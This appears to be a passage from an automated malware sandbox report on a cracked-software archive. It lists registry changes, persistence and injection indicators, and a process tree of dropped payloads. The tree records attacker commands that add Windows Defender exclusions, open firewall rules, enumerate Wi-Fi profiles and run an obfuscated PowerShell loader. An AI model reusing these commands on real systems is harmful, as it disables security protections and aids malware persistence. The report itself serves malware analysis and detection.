Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "10"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	firefox.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	process
5628	schtasks.exe
6024	schtasks.exe
6916	schtasks.exe
6768	schtasks.exe
6300	schtasks.exe
6732	schtasks.exe
6284	schtasks.exe
6804	schtasks.exe
5188	schtasks.exe
6864	schtasks.exe
2772	schtasks.exe
7848	schtasks.exe
5256	schtasks.exe
5772	schtasks.exe
6768	schtasks.exe
6484	schtasks.exe
7516	schtasks.exe
2228	schtasks.exe
7848	schtasks.exe
7812	schtasks.exe
6104	schtasks.exe
6056	schtasks.exe
5264	schtasks.exe
6036	schtasks.exe
5628	schtasks.exe
6672	schtasks.exe
6476	schtasks.exe
2812	schtasks.exe
7984	schtasks.exe
7852	schtasks.exe
8012	schtasks.exe
6056	schtasks.exe
5220	schtasks.exe
6284	schtasks.exe
6872	schtasks.exe
6484	schtasks.exe
7748	schtasks.exe
6480	schtasks.exe
7332	schtasks.exe
5780	schtasks.exe
2964	schtasks.exe
7808	schtasks.exe
2200	schtasks.exe
5808	schtasks.exe
6484	schtasks.exe
6480	schtasks.exe
6404	schtasks.exe
7940	schtasks.exe
6592	schtasks.exe
6684	schtasks.exe
7656	schtasks.exe
7532	schtasks.exe
7148	schtasks.exe
6448	schtasks.exe
5524	schtasks.exe
8024	schtasks.exe
7684	schtasks.exe
6900	schtasks.exe
6028	schtasks.exe
724	schtasks.exe
5704	schtasks.exe
5732	schtasks.exe
1360	schtasks.exe
6716	schtasks.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

firefox.exe

pid process

4048 firefox.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

firefox.exe

description	pid	process
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe
Token: SeDebugPrivilege	4048	firefox.exe

Suspicious use of FindShellTrayWindow 21 IoCs

Processes:

firefox.exe

pid	process
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

Processes:

firefox.exe

pid	process
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe
4048	firefox.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

firefox.exe

pid process

4048 firefox.exe
4048 firefox.exe
4048 firefox.exe
4048 firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 4804 wrote to memory of 4048	4804	firefox.exe	firefox.exe
PID 4804 wrote to memory of 4048	4804	firefox.exe	firefox.exe
PID 4804 wrote to memory of 4048	4804	firefox.exe	firefox.exe
PID 4804 wrote to memory of 4048	4804	firefox.exe	firefox.exe
PID 4804 wrote to memory of 4048	4804	firefox.exe	firefox.exe
PID 4804 wrote to memory of 4048	4804	firefox.exe	firefox.exe
PID 4804 wrote to memory of 4048	4804	firefox.exe	firefox.exe
PID 4804 wrote to memory of 4048	4804	firefox.exe	firefox.exe
PID 4804 wrote to memory of 4048	4804	firefox.exe	firefox.exe
PID 4804 wrote to memory of 4048	4804	firefox.exe	firefox.exe
PID 4804 wrote to memory of 4048	4804	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 540	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 4120	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 4120	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 4120	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 4120	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 4120	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 4120	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 4120	4048	firefox.exe	firefox.exe
PID 4048 wrote to memory of 4120	4048	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\クラック.zip
1⤵
PID:1828

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4408

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4804
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4048
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cbe40c60-5202-4be4-9fab-d53bf0717104} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" gpu
    3⤵
    PID:540
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2428 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2400 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c5e41cfe-13ca-4d87-b2df-bedba6b1f498} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" socket
    3⤵
    PID:4120
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3228 -childID 1 -isForBrowser -prefsHandle 2732 -prefMapHandle 3212 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a3b4e6f-ada7-4c43-a393-2c1e4ca44eee} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" tab
    3⤵
    PID:1452
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1332 -childID 2 -isForBrowser -prefsHandle 3672 -prefMapHandle 3684 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c47c2ac9-3903-41b0-a26c-dadeff6cee3d} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" tab
    3⤵
    PID:652
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4796 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4744 -prefMapHandle 4752 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fadc225-8264-4d12-955f-f08c774b6f9a} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" utility
    3⤵
    - Checks processor information in registry
    PID:372
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 3 -isForBrowser -prefsHandle 5292 -prefMapHandle 5288 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f9587ef-b6de-4955-b095-18f709294559} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" tab
    3⤵
    PID:3204
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5124 -childID 4 -isForBrowser -prefsHandle 5436 -prefMapHandle 5444 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {146017b8-70c2-4275-9fe1-d4406b78a895} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" tab
    3⤵
    PID:424
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 5 -isForBrowser -prefsHandle 5604 -prefMapHandle 5608 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01fb892c-46f5-44b7-929b-d766341c1323} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" tab
    3⤵
    PID:1956
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6256 -childID 6 -isForBrowser -prefsHandle 6248 -prefMapHandle 6192 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc0a7e43-98b0-4cbb-9765-f46e16732ad4} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" tab
    3⤵
    PID:5004
- - C:\クラック.exe
    "C:\クラック.exe"
    3⤵
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:3380
  - - C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe
      "C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe"
      4⤵
      PID:948
  - - C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe
      "C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe"
      4⤵
      PID:1908
    - - C:\Users\Default User\firefox.exe
        
        "C:\Users\Default User\firefox.exe"
        5⤵
        
        PID:5580
  - - C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe
      "C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe"
      4⤵
      PID:4660
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5228
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:8128
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4248
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        6⤵
        
        PID:7344
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        5⤵
        
        PID:7588
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:6300
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        6⤵
        
        PID:4876
  - - C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe
      "C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe"
      4⤵
      PID:3780
    - - C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        5⤵
        
        PID:6836
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:3132
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM Exsample.exe
        6⤵
        Kills process with taskkill
        
        PID:6848
  - - C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe
      "C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe"
      4⤵
      PID:3316
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:5604
  - - C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe
      "C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe"
      4⤵
      PID:2380
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Happy18.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7180
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Client.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7484
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jre-1.8\winlogon.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7268
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8168
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Defender\kosomk.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7808
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6896
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TROr9NvLwv.bat"
        5⤵
        
        PID:7296
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:7128
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:5760
      - C:\Program Files\Windows Media Player\RuntimeBroker.exe
        
        "C:\Program Files\Windows Media Player\RuntimeBroker.exe"
        6⤵
        
        PID:8032
  - - C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
      "C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe"
      4⤵
      PID:2320
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        
        "Powershell.exe" -windowstyle minimized "$Teratism249 = Get-Content 'C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168' ; $Neglefilen=$Teratism249.SubString(69482,3);.$Neglefilen($Teratism249) "
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5632
  - - C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe
      "C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe"
      4⤵
      PID:2620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qjPxm1aaqg.bat"
        5⤵
        
        PID:5728
  - - C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe
      "C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe"
      4⤵
      PID:5140
  - - C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
      "C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"
      4⤵
      PID:5228
    - - C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe
        
        "C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe"
        5⤵
        
        PID:7288
  - - C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe
      "C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe"
      4⤵
      PID:5304
    - - C:\Windows\winhlp32.exe
        
        winhlp32.exe -x
        5⤵
        
        PID:5396
    - - C:\Windows\winhlp32.exe
        
        winhlp32.exe -x
        5⤵
        
        PID:5964
  - - C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
      "C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"
      4⤵
      PID:5412
  - - C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe
      "C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe"
      4⤵
      PID:5476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\firefox.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7824
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jre-1.8\virus.jk.jk.exe'
        5⤵
